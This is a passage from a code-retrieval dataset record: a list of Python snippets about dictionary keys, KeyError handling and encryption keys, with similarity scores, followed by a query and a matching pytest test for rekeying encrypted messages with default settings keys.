self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n zeroth = res.header.revision\n d[\"node\"][\"value\"] = \"test1\"\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n self.assertEqual(zeroth + 1, res.header.revision)\n self.assertEqual(self.client.get(d[\"node\"][\"key\"])[0], b(d[\"node\"][\"value\"]))", "def test_validate_with_invalid_key_format_type(self):\n key_format_type = \"invalid\"\n kwargs = {'key_format_type': key_format_type}\n\n self.assertRaisesRegex(\n TypeError, \"invalid key format type\", Digest, **kwargs)", "def test_get_empty(empty_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n empty_bucket.get(\"key 1\")", "def test_primary_key_update_failure(self):\n m0 = TestUpdateModel.create(count=5, text='monkey')\n with self.assertRaises(ValidationError):\n m0.update(partition=uuid4())", "def test_primary_key_update_failure(self):\r\n m0 = TestUpdateModel.create(count=5, text='monkey')\r\n with self.assertRaises(ValidationError):\r\n m0.update(partition=uuid4())", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! 
The key '{ke}' does not exist in test_dict!\")", "def _validate_key(self, key):\n if isinstance(key, str):\n key = unicode(key, 'utf-8')\n elif not isinstance(key, unicode):\n raise TypeError(\n \"`key` must be `str` or `unicode`, not `{}`\".format(\n key.__class__.__name__)\n )\n return key", "def test_getitem_cleared_key(testchannel):\n key = testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _keychainExists(self, key, create_new=False):\n if ErrMsg._validateKey(key):\n curr_dict = self._errors\n\n for i, comp in enumerate(key._comps):\n create_type = dict if i < 2 else list\n if comp in curr_dict.keys():\n curr_dict = curr_dict[comp]\n else:\n if create_new:\n curr_dict[comp] = create_type()\n curr_dict = curr_dict[comp]\n else:\n return False\n return True", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def test_key_without_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def Raise(self, exception, key, *args):\n self._add(key, *args)\n if exception:\n raise exception(key.message, *args)", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_from_dict_bad_event_key(self):\n from google.appengine.ext import ndb\n\n from sosbeacon.event.event import Event\n from sosbeacon.event.message import Message\n\n event_key = ndb.Key(Event, 1)\n\n self.assertRaisesRegexp(\n Exception, \"Event not found\",\n Message.from_dict, {'event': event_key})", "def duplicate_transition_raise_error(old_transition, new_transition):\n raise ValueError(\"Attempting to re-insert transition %s\" % old_transition)", "def test_primary_key_update_failure(self):\r\n with self.assertRaises(ValidationError):\r\n TestQueryUpdateModel.objects(partition=uuid4(), cluster=3).update(cluster=5000)", "def test_no_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(description=\"container\", software_system=system1)", "def fail(team, chal, request):\n provided_key = request.form['key'].strip()\n wrong = WrongKeys(teamid=team.id, chalid=chal.id, 
ip=utils.get_ip(request), flag=provided_key)\n db.session.add(wrong)\n db.session.commit()\n db.session.close()" ]
[ "0.71822304", "0.70056105", "0.69519156", "0.6922246", "0.6791061", "0.6753472", "0.6749198", "0.67076725", "0.66495234", "0.6584771", "0.6557083", "0.65199524", "0.65018636", "0.64907044", "0.6454335", "0.64416265", "0.6438558", "0.6431475", "0.6424363", "0.6396235", "0.63894755", "0.6379695", "0.6369072", "0.6369072", "0.6349258", "0.6336291", "0.6314593", "0.6310023", "0.6263599", "0.6214058", "0.619933", "0.6195926", "0.61839104", "0.6180844", "0.61710143", "0.61701", "0.61675197", "0.6160887", "0.61553526", "0.6134571", "0.6133002", "0.6122567", "0.61141545", "0.6102656", "0.60887134", "0.6081197", "0.6072503", "0.60629517", "0.6060599", "0.6059191", "0.60574055", "0.6054328", "0.60524935", "0.60360503", "0.60320467", "0.60289913", "0.602703", "0.6023822", "0.6020414", "0.6018472", "0.60141885", "0.60129935", "0.60079235", "0.6005047", "0.5995934", "0.599087", "0.59876066", "0.59824985", "0.5976984", "0.59693676", "0.59335774", "0.59328085", "0.5929741", "0.5929209", "0.5920798", "0.59121513", "0.5911046", "0.59101313", "0.59052426", "0.59047633", "0.58857906", "0.5881801", "0.58813184", "0.58812696", "0.58803886", "0.58695865", "0.5867112", "0.5854723", "0.58537847", "0.5852574", "0.58463204", "0.58360684", "0.58129025", "0.58075684", "0.5802714", "0.57844764", "0.5769324", "0.5767626", "0.5765389", "0.575955" ]
0.7050168
1
It uses the settings for the default old and new key.
def test_rekey_defaults(self, settings):
    old_key = b'0' * 32
    new_key = b'1' * 32
    settings.CHITON_ENCRYPTION_KEY = new_key
    settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key
    encrypted = encrypt('message', key=old_key)
    rekeyed = rekey(encrypted)
    assert decrypt(rekeyed) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_key(self):\n self.__prev_key = self.__new_key", "def update_dict(new,old):", "def _newKey(self, key):\n pass", "def update_default_from_dict(self, key, value):\n pass", "def test_overwrite(self):\n set_default_for_missing_keys('hello world')\n set_default_for_missing_keys(123, overwrite=True)\n\n assert DotWizPlus().missing_key == 123", "def _swap_settings(new):\n settings = django.conf.settings\n old = {}\n for key, value in new.iteritems():\n old[key] = getattr(settings, key, None)\n setattr(settings, key, value)\n return old", "def test_load_updates_dict(self):\n new_dict = {\n 'test_new_key': 'test_new_value',\n 'test_key1': 'new_value',\n }\n self.extension.registration.settings = new_dict\n self.settings.load()\n\n # Should have added test_new_key, and modified test_key1\n self.assertEqual(new_dict['test_new_key'],\n self.settings['test_new_key'])\n self.assertEqual(new_dict['test_key1'], self.settings['test_key1'])\n\n # Should have left test_key2 alone\n self.assertEqual(self.test_dict['test_key2'],\n self.settings['test_key2'])", "def setdefault(self, key):\n pass", "def _reset_changes(self):\r\n self._original = {}\r\n if self.last_updated is not None:\r\n self._original['last_updated'] = self.last_updated", "def trello_updates(new, old):\n try:\n return {k: (v, new[k]) for k, v in old.iteritems()}\n except KeyError:\n return {k: (v, None) for k, v in old.iteritems()}", "def rename_dictkey(self, kwargs, old, new):\n x = kwargs.copy()\n x[new] = x.pop(old)\n return x", "def _metrics_update(orig, new):\n revsd = orig\n for k, v in orig.items():\n if not v:\n revsd[k] = new[k]\n elif new[k]:\n if new[k] != v:\n # LOG ME, do something\n print(orig)\n print(new)\n elif not new[k] or v:\n pass\n else:\n raise Exception(\"_metrics_update error\")\n return revsd", "def _update_key(cls, spec):\n if cls.KEY is not None:\n cls._set_key(spec, spec[\"keys\"].popleft())\n elif cls.REF is not None:\n spec[\"ref\"] = cls.REF", "def upgrade_settings(self, keys):\n upgradable_keys = {\n \"project_dir\": \"%root_dir%\",\n \"source_folder\": \"%source_folder%\",\n \"packages_path\": \"%packages_path%\",\n \"sep\": \"%sep%\",\n \"$\": \"$\"\n }\n for key in keys:\n value, from_global = self.get(key, as_tuple=True)\n value = value.replace(\"%\", \"%%%\")\n for k in upgradable_keys:\n value = value.replace(\"$\" + k, upgradable_keys[k])\n self.set(key, value, to_global=from_global)", "def setdefault_key_value(self):\n raise NotImplementedError", "def add_default_args(kwargs_old, **kwargs_new):\n for key in kwargs_new:\n if key not in kwargs_old:\n kwargs_old[key] = kwargs_new[key]", "def test_newkey(self):\n d = {\n \"action\": \"set\",\n \"node\": {\n \"expiration\": \"2013-09-14T00:56:59.316195568+02:00\",\n \"modifiedIndex\": 183,\n \"key\": u(\"/testkey\"),\n \"ttl\": 19,\n \"value\": \"test0\",\n },\n }\n\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n zeroth = res.header.revision\n d[\"node\"][\"value\"] = \"test1\"\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n self.assertEqual(zeroth + 1, res.header.revision)\n self.assertEqual(self.client.get(d[\"node\"][\"key\"])[0], b(d[\"node\"][\"value\"]))", "def setdefault(self, k, d=None): # real signature unknown; restored from __doc__\n pass", "def on_change(key):\n pass", "def _swap_keys(ordered_dict, old_key, new_key):\n return odict(\n (new_key, val) if key == old_key else (key, val)\n for key, val in ordered_dict.iteritems()\n )", "def _update_default_dict(main, other):\r\n for k, v in 
other.items():\r\n main[k] += v", "def __swap_kv(self, node1, node2):\r\n node1.key, node2.key = node2.key, node1.key\r\n node1.value, node2.value = node2.value, node1.value", "def update_config(original, new):\n for k, v in new.items():\n if isinstance(v, abc.Mapping):\n original[k] = update_config(original.get(k, {}), v)\n else:\n original[k] = v\n return original", "def keyEquivalent( self ):\n\t\treturn None", "def renameKey(self, oldKey, newKey, meta=None, units=None):\n\n if meta:\n if oldKey not in meta:\n return\n meta.replaceKey(oldKey, newKey)\n if units:\n if oldKey not in units:\n return\n units.replaceKey(oldKey, newKey)", "def construct_kv_dict(self):\r\n key1 = self.key_factory('existing_field')\r\n key2 = self.key_factory('other_existing_field')\r\n new_value = 'new value'\r\n newer_value = 'newer value'\r\n return {key1: new_value, key2: newer_value}", "def config_from_user(self):\n if self.configDict is not None and len(self.configDict.keys()) > 0:\n for key in sorted(self.configDict.keys()):\n tempInput = input(\n 'set ' + key + '(currently ' + str(self.configDict[key]) + ') to :')\n if tempInput != '':\n self.configDict[key] = tempInput\n else:\n print ('starting with a new empty dictionary...')\n self.configDict = {}\n while True:\n key = input('Enter a new Key, or -1 to quit:')\n if key == '-1' or key == '':\n break\n else:\n value = input('Enter a value for ' + key + ':')\n self.configDict.update({key: value})", "def change(self, key, old_value, new_value):\n try:\n parts = self.list(key)\n try: parts[parts.index(old_value)] = new_value\n except ValueError:\n self[key] = new_value\n else:\n self[key] = \"\\n\".join(parts)\n except KeyError: self[key] = new_value", "def construct_kv_dict(self):\r\n key1 = user_state_key('field_a')\r\n key2 = user_state_key('field_b')\r\n new_value = 'new value'\r\n newer_value = 'newer value'\r\n return {key1: new_value, key2: newer_value}", "def test_merge_overwrite_missing_source_key(self):\n mdict = copy.deepcopy(self.dict1)\n mdict[\"D\"] = \"new\"\n ret = dictupdate.merge_overwrite(copy.deepcopy(self.dict1), {\"D\": \"new\"})\n self.assertEqual(mdict, ret)", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def switch_on_key(self, key):\n if key in self.switched_off_keys:\n self._switched_off_keys.pop(self._switched_off_keys.index(key))\n self._config[key] = self._config.pop(\"# \"+key)", "def _update_dict(self, d1, d2):\n overridden = {} # contains parameters that were overwritten as tuples (old,new)\n\n for section, prms in d2.iteritems():\n if \"group_contribution\" in section or \"restraints\" in section or \"lambdas\" in section:\n if section in d1:\n overridden[section] = (d1[section], prms)\n d1[section] = prms\n else:\n if section not in d1:\n d1[section] = {}\n for keyword,prm in prms.iteritems():\n if keyword in d1[section]:\n if d1[section][keyword] != prm:\n overridden[section + \"/\" + keyword] = (d1[section][keyword], prm)\n d1[section][keyword] = prm\n return overridden", "def replace_key(newKey, oldKey, filename, ssh):\n ssh.exec_command(\"sed -i 's;%s;%s;g' %s\" % (oldKey, newKey, filename))", "def override_model_args(old_args, new_args):\r\n global MODEL_OPTIMIZER\r\n old_args, new_args = vars(old_args), vars(new_args)\r\n for k in 
old_args.keys():\r\n if k in new_args and old_args[k] != new_args[k]:\r\n if k in MODEL_OPTIMIZER:\r\n logger.info('Overriding saved %s: %s --> %s' %\r\n (k, old_args[k], new_args[k]))\r\n old_args[k] = new_args[k]\r\n else:\r\n logger.info('Keeping saved %s: %s' % (k, old_args[k]))\r\n\r\n return argparse.Namespace(**old_args)", "def test_old_from_and_to_text(self):\n rkeyring = dns.tsigkeyring.from_text(old_text_keyring)\n tkeyring = dns.tsigkeyring.to_text(rkeyring)\n self.assertEqual(tkeyring, old_text_keyring)", "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def conf_update(self):\n pass", "def reset(self):\n self.keyToFile=dict()", "def replace_default_urls():\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json') as default_urls_json:\n default_dict = json.load(default_urls_json)\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/recent_urls.json') as recent_urls_json:\n recent_dict = json.load(recent_urls_json)\n for key, value in recent_dict.items():\n default_dict[key] = value\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json', 'w') as fp:\n json.dump(default_dict, fp, sort_keys=True, indent=4)", "def replace_cfs(old_key, new_key):\n altered_methods = []\n for name in methods:\n changed = False\n data = Method(name).load()\n for line in data:\n if line[0] == old_key:\n line[0], changed = new_key, True\n if changed:\n Method(name).write(data)\n altered_methods.append(name)\n return altered_methods", "def decrease_key(self, old_item, new_item):", "def test_changing_defaults_doesnt_autocommit_to_file():\n state = StateFile()\n state.coolkey = StateAttr(state_file=state,\n key_name=\"cool_key\",\n default=3)\n with pytest.raises(StateNotAcquiredError):\n state.coolkey.read()\n\n with state:\n assert state.coolkey.read() == 3\n\n # Now create a new statefile with a DIFFERENT default, and make sure that\n # didn't get written to the file\n state = StateFile()\n state.coolkey = StateAttr(state_file=state,\n key_name=\"cool_key\",\n default=420)\n with state:\n assert state.coolkey.read() == 3", "def __init__(self, key: str, value: str) -> None:\n self.key = key\n self.value = value\n self.old_value = \"\"\n if Config.has_value(key):\n self.old_value = Config.get_value(key)", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def _browse_to_old_dict(self):\n lang = self.ddnGuiLanguage.get()\n\n filein = filedialog.askopenfilename(\\\n filetypes=[('Map Creator Dictionary', '.xml'), ], \\\n initialdir=self.MapCreator, \\\n initialfile='', \\\n title=LOCALIZED_TEXT[lang]['Map Creator Dictionary'], \\\n defaultextension='.xml')\n self.old_dict.set(filein)\n pass", "def _update(d):\n newd = copy.deepcopy(default)\n\n if 'lastdir' in d:\n newd['lastdir'] = d['lastdir']\n\n return newd", "def _update_prepend_key(self):\n self.prepend_key -= 1", "def apply_current_or_orig_values(override, current_version, args):\n keys = args.keys\n if current_version:\n print \"\\tUsing metadata values from {} version {}.\".format(\n current_version[\"name\"], current_version[\"version\"])\n for key in keys:\n current_val = current_version.get(key)\n if current_val:\n override[\"Input\"][\"pkginfo\"][key] = current_val\n else:\n default = override[\"Input_Original\"].get(\n \"pkginfo\", {}).get(key, \"\")\n choice = \"\"\n if not args.no_prompt:\n print \"\\tNo current '%s' value 
found to apply.\" % key\n print \"\\tRecipe specifies: '%s'\" % default\n choice = raw_input(\"\\tHit enter to use the recipe value, or \"\n \"enter a new value: \")\n override[\"Input\"][\"pkginfo\"][key] = (\n default if choice == \"\" else choice)", "def test_dictionary_inplace_update(self):\r\n vm = Dictionary.value_manager(None, None, {1:2, 3:4})\r\n assert not vm.changed\r\n vm.value[4] = 5\r\n assert vm.changed", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def getChanged(self,key,default=None):\n if default != None and key not in self.data:\n self.data[key] = default\n self.setChanged(key)\n return self.data.get(key)", "def check_get_and_set_method_for_key(self, tab, key):\r\n old_value = tab[key]\r\n new_value = 'New Value'\r\n tab[key] = new_value\r\n self.assertEquals(tab[key], new_value)\r\n tab[key] = old_value\r\n self.assertEquals(tab[key], old_value)", "def update_start_settings(self, key, value):\n\n if key in self._start_settings:\n self._start_settings[key] = value\n else:\n print(\"key does not exist!! keys include: {charge_option, prec, encut, nstep, epsilon, pseudo, n_elect.structure, smear, sigma, isym}\")", "def switch_off_key(self, key):\n if key not in self.switched_off_keys:\n self._switched_off_keys.append(key)\n self._config[\"# \"+key] = self._config.pop(key)", "def _set_toChange(x):\n for key in list(x.keys()):\n self.toChange[key] = True", "def harmonize_keys(self):\n self._data.key_regex_replacements = _key_regex_replacements\n self._data.key_replacements = _key_replacements", "def _update(self, *keys_and_val):\n if len(xxx) < 2:\n raise NotEnoughInfo\n value, *location = xxx[::-1]\n location.reverse()\n final_key = location.pop()\n ptr__target_dct = get_target_dct(location)\n ptr__target_dct[final_key] = value\n return", "def old_passwords(self, old_passwords):\n\n self._old_passwords = old_passwords", "def remap_keys(ds, new_keys):\n logger.info(\"Remapping keys of every element using config:\\n %s\", _dict_to_logstring(new_keys))\n\n def remap_keys(x):\n return {new_keys.get(k, k): v for k, v in x.items() if new_keys.get(k, k) is not None}\n return ds.map(remap_keys, num_parallel_calls=TF_AUTOTUNE)", "def _overwrite_parameters_from_input(self, new_params):\n params_overwrite = self.inputs.params_overwrite.get_dict()\n for key, val in params_overwrite.items():\n if key in new_params:\n self.report('ATTENTION: overwriting parameter from \"params_overwrite\" input')\n self.report(f'key: {key}')\n self.report(f'old value: {new_params[key]}')\n self.report(f'overwritten value: {val}')\n new_params[key] = val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def _copy_cipher_settings(self, other):\n other.cipherNames = self.cipherNames\n other.macNames = self.macNames\n other.keyExchangeNames = self.keyExchangeNames\n other.cipherImplementations = self.cipherImplementations\n other.minVersion = self.minVersion\n other.maxVersion = self.maxVersion\n other.versions = 
self.versions", "def _mergeKeys(self, other):\n for id in set(other.clock.keys()).difference(set(self.clock.keys())):\n self.clock[id] = 0\n for id in set(self.clock.keys()).difference(set(other.clock.keys())):\n other.clock[id] = 0", "def _refresh(self):\n # if we have all the values we need to hookup to the URL\n for key in self.DBMSettings.keys():\n if not key.startswith(LOCALCHAR):\n self.DBMSettings[key] = self._urldict()[key]", "def _add_missing_keys(self):\n for k, v in self.defaults.items():\n if k not in self.data:\n self.data[k] = v\n\n self.save()", "def _eq_key(self):\n return super(UpdateMessage, self)._eq_key + (self.previous_payload,)", "def test_migrating_old_and_new_keys(self):\n yield self.mk_simple_models_old(1)\n yield self.mk_simple_models_new(1, start=1)\n yield self.mk_simple_models_old(1, start=2)\n model_migrator = self.make_migrator(self.default_args)\n loads, stores = self.recorded_loads_and_stores(model_migrator)\n\n yield model_migrator.run()\n self.assertEqual(model_migrator.output, [\n \"Migrating ...\",\n \"Done, 3 objects migrated.\",\n ])\n self.assertEqual(sorted(loads), [u\"key-0\", u\"key-1\", u\"key-2\"])\n self.assertEqual(sorted(stores), [u\"key-0\", u\"key-2\"])", "def default_values():\n return pad_keys({}, default_basenames())", "def override_opt(self, new_opt):\n model_args = {'optimizer', 'lookuptable', 'beam_size'}\n for k, v in new_opt.items():\n if k not in model_args:\n # skip non-model args\n continue\n if k not in self.opt:\n print('[ Adding new option: | {k}: {v} | ]'.format(k=k, v=v))\n elif self.opt[k] != v:\n print('[ Overriding option: | {k}: {old} => {v} | ]'.format(\n k=k, old=self.opt[k], v=v))\n self.opt[k] = v\n if 'dict_file' in new_opt and not self.opt.get('dict_file'):\n print('[ No dictionary path detected, trying to load previous '\n 'path {} ]'.format(new_opt['dict_file']))\n self.opt['dict_file'] = new_opt['dict_file']\n return self.opt", "def load_key():", "def test_copy_new_keys_to_locale_no_changes(self):\n primary_dict = {\n \"one\": {\"hoge\": \"hoge\",\n \"naruhodo\": \"naruhodo\"}\n }\n\n secondary_dict = {\n \"one\": {\"hoge\": \"ほげ\",\n \"naruhodo\": \"なるほど\"}\n }\n\n copy_new_keys_to_locale(primary_dict, secondary_dict)\n\n expected_dict = {\n \"one\": {\"hoge\": \"ほげ\",\n \"naruhodo\": \"なるほど\"}\n }\n self.assertEqual(write_json(expected_dict), write_json(secondary_dict))", "def make_consistent(self):\r\n\r\n for key in self.get_keys():\r\n self.eliminate_key(key)\r\n\r\n for i_temp in self.indexes(): #i will be a note index\r\n for j_temp in self.get_keys_from_note(i_temp):\r\n if self.key_dict_contains(j_temp):\r\n self.add_key(j_temp,Index(i_temp))\r\n## self.key_dict[j_temp].add(str(Index(i_temp)))\r\n else:\r\n self.initiate_new_key(j_temp,Index(i_temp))", "def get(self, key, default=None):", "def setOriginal(self,neworiginal):\n\t\tself.original = neworiginal;", "def _update_use(self, key):\n\t\tif (self._replace_pol == Cache.LRU):\n\t\t\tself.cache[key]= self.hashmap[key]\n\t\tif (self._replace_pol == Cache.LRU_S):\n\t\t\tself.cache[key] = self.hashmap[key]", "def _put_to_back(self, key, value):\n\n pass", "def default(self, name, new=None, erase=False):\n # Check existence\n if name not in self._defaults:\n raise tools.UnavailableException(self._defaults, name, what=\"model default\")\n # Get current\n old = self._defaults[name]\n # Set if needed\n if erase or new is not None:\n self._defaults[name] = new\n # Return current/old\n return old", "def _value_changed(self, name, old, new):\n if 
self.value_lock.acquire(False):\n try:\n # Reverse dictionary lookup for the value name\n for k, v in self._options_dict.items():\n if self.equals(new, v):\n # set the selected value name\n self.selected_label = k\n return\n # undo the change, and raise KeyError\n self.value = old\n raise KeyError(new)\n finally:\n self.value_lock.release()", "def resetStoredDefaults( self ):\n keys= list( self._defDict.keys() )\n data= [ self._defDict[ aKey ] for aKey in keys ]\n \n self.prefObj.save( group= self.prefGroup, name= keys, data= data )\n self.resetSelfWithDefaults()", "def testDefault():\n\n conf = naiveConf.NaiveConf(exampleConfFname)\n oldX = conf.x\n conf.default('x', None)\n conf.default('Z', 5)\n\n assert conf.x == oldX\n assert conf.Z == 5", "def _restore_default(self):\n raise NotImplementedError(\"Should have implemented this.\")", "def set_properties(old, new, self_name=None):\n properties = {\n 'name': self_name if self_name else old.name,\n 'hostname': old.attrs['Config']['Hostname'],\n 'user': old.attrs['Config']['User'],\n 'detach': True,\n 'domainname': old.attrs['Config']['Domainname'],\n 'tty': old.attrs['Config']['Tty'],\n 'ports': None if not old.attrs['Config'].get('ExposedPorts') else [\n (p.split('/')[0], p.split('/')[1]) for p in old.attrs['Config']['ExposedPorts'].keys()\n ],\n 'volumes': None if not old.attrs['Config'].get('Volumes') else [\n v for v in old.attrs['Config']['Volumes'].keys()\n ],\n 'working_dir': old.attrs['Config']['WorkingDir'],\n 'image': new.tags[0],\n 'command': old.attrs['Config']['Cmd'],\n 'host_config': old.attrs['HostConfig'],\n 'labels': old.attrs['Config']['Labels'],\n 'entrypoint': old.attrs['Config']['Entrypoint'],\n 'environment': old.attrs['Config']['Env'],\n 'healthcheck': old.attrs['Config'].get('Healthcheck', None)\n }\n\n return properties", "def reinit (self):\n #for name, obj in inspect.getmembers (self):\n ## if isinstance (obj, RField):\n # self.keyvals[name] = obj.default\n inspect.getmembers (self)", "def _setCurrents(self, att, newdata):\n logger.debug(\"Func: _setCurrents\")\n\n self._currentsDict[att] = newdata\n self._saveUserPrefs(self._currentsDict)", "def _update_input_config(input_config,secret_key):\n\n for key in input_config.keys():\n if input_config[key].get('arguments') is None:\n input_config[key]['arguments'] = {'secret':secret_key}\n elif input_config[key]['arguments'].get('secret') is None:\n input_config[key]['arguments']['secret'] = secret_key", "def merge_default_from_dict(self, key, value, lists_only=False):\n pass", "def test_dictionary_update(self):\r\n vm = Dictionary.value_manager(None, None, {1:2, 3:4})\r\n assert not vm.changed\r\n vm.value = {4:5}\r\n assert vm.changed", "def old(self, old):\n\n self._old = old", "def update_transforms(self, old_transforms, new_transforms):\n updated_transforms = {}\n for new_key, new_value in new_transforms.items():\n #if not new_key in old_transforms.valus():\n # old_transforms[new_key] = new_key\n\n if new_value[1] == \"transitive\":\n try:\n #updated_transforms[{v: k for k, v in old_transforms.items()}[new_key]] = new_value[0]\n #updated_transforms[old_transforms[new_key]] = new_value[0]\n updated_transforms[new_key] = old_transforms[new_value[0]]\n except KeyError:\n updated_transforms[new_key] = new_value[0]\n\n elif new_value[1] == \"additive\":\n # Perhaps needs to be adjusted, made more sophisticated\n # so that a new character is introduced even if it wasn't in the current segment\n if new_value[0] not in old_transforms:\n updated_transforms[new_key] = 
new_value[0]\n else:\n updated_transforms[new_key] = add_character_symbol_suffix(new_value[0], auto=True)\n if self.storyline:\n self.storyline.add_character([updated_transforms[new_key]],[updated_transforms[new_key]])\n else:\n self.add_character([updated_transforms[new_key]],[updated_transforms[new_key]])\n else:\n raise ValueError(\"Must be additive or transitive transposition\")\n for old_key, old_value in old_transforms.items():\n\n if old_key not in updated_transforms:\n updated_transforms[old_key] = old_transforms[old_key]\n\n #updated_transforms = dict(old_transforms, **{key:old_transforms[new_transforms[key]] for key in new_transforms.keys()})\n return updated_transforms", "def _restore_default(self):\n self._data = self._default", "def test_020_change_settings(self):\n\n testflow.step(\"Modifying settings via CLI\")\n assert self.settings_cli.run(\n 'set',\n name='MESSAGE_OF_THE_DAY',\n value='Zdravicko',\n )[0], \"Failed to change MESSAGE_OF_THE_DAY setting\"\n\n testflow.step(\"Querying for modified setting\")\n show_out = self.settings_cli.run(\n 'show',\n name='MESSAGE_OF_THE_DAY',\n )\n assert show_out[0], 'Failed to run show command'\n assert 'Zdravicko' in show_out[1], 'Setting value was not changed'\n\n testflow.step(\"Modifying setting back to default\")\n assert self.settings_cli.run( # Change value back to default\n 'set',\n name='MESSAGE_OF_THE_DAY',\n value='',\n )[0], \"Failed to change MESSAGE_OF_THE_DAY setting to defaul value\"", "def get_diff(self, old, new, add_all):\n\n adds = []\n dels = []\n\n if old:\n oldcfg = old[0].get('config', '')\n else:\n oldcfg = ''\n\n if new:\n newcfg = new[0].get('config', '')\n else:\n newcfg = ''\n\n if oldcfg and not newcfg:\n dels = new\n elif (newcfg and not oldcfg) or add_all:\n adds = new\n else:\n hash_old = hash(oldcfg)\n hash_new = hash(newcfg)\n if hash_old != hash_new:\n adds = new\n\n return adds, dels", "def test_set_default(self):\n result = self.param_dict.get_config()\n self.assertEquals(result[\"foo\"], None)\n self.param_dict.set_default(\"foo\")\n self.assertEquals(self.param_dict.get(\"foo\"), 10)\n self.param_dict.update(\"foo=1000\")\n self.assertEquals(self.param_dict.get(\"foo\"), 1000)\n self.param_dict.set_default(\"foo\")\n self.assertEquals(self.param_dict.get(\"foo\"), 10)\n \n self.assertRaises(ValueError, self.param_dict.set_default, \"qux\")", "def test_save_updates_database(self):\n registration = self.extension.registration\n self.settings['test_new_key'] = 'Test new value'\n generated_dict = dict(self.settings)\n self.settings.save()\n\n self.assertTrue(registration.save.called)\n self.assertEqual(generated_dict, registration.settings)", "def _options_changed(self, name, old, new):\n if self.options_lock.acquire(False):\n try:\n self.options = new\n\n options = self._make_options(new)\n self._options_dict = {i[0]: i[1] for i in options}\n self._options_labels = [i[0] for i in options]\n self._options_values = [i[1] for i in options]\n self._value_in_options()\n finally:\n self.options_lock.release()", "def update(self, *args, **kwargs):\n super(ReadOnlyDict, self).update(*args, **kwargs) # pragma: no cover", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def link_into_dictionary(old_dictionary, old_keys, new_key):\n linked = dict()\n for old_key in old_keys:\n if old_key in linked:\n 
linked[old_key] = old_dictionary[old_key]\n del old_dictionary[old_key]\n old_dictionary[new_key] = linked\n return old_dictionary", "def change_key(self): \r\n dialog = QtWidgets.QFileDialog(self)\r\n dialog.setFileMode(QtWidgets.QFileDialog.AnyFile)\r\n if dialog.exec_():\r\n key_file = dialog.selectedFiles()[0]\r\n \r\n # load key file and create new Encryptor object\r\n try:\r\n self.encryptor.set_key_from_keyfile(key_file)\r\n # set field content\r\n self.field_key.setText(Path(key_file).name)\r\n self.label_chg_key.setText(\"Key loaded\")\r\n self.label_chg_key.setStyleSheet(\"color:#01ac2d\")\r\n self.field_pwd.clear()\r\n self.label_chg_pwd.clear()\r\n QtWidgets.QMessageBox.information(self, \"Key File Change\", \r\n (\"Your key file has been successfully loaded.\\n\\n\"\r\n \"You can now encrypt / decrypt files.\"))\r\n except Exception as e:\r\n QtWidgets.QMessageBox.critical(self, \"File Loading Error\", \r\n \"An error has occured during file loading:\\n\\n{}\".format(repr(e)))" ]
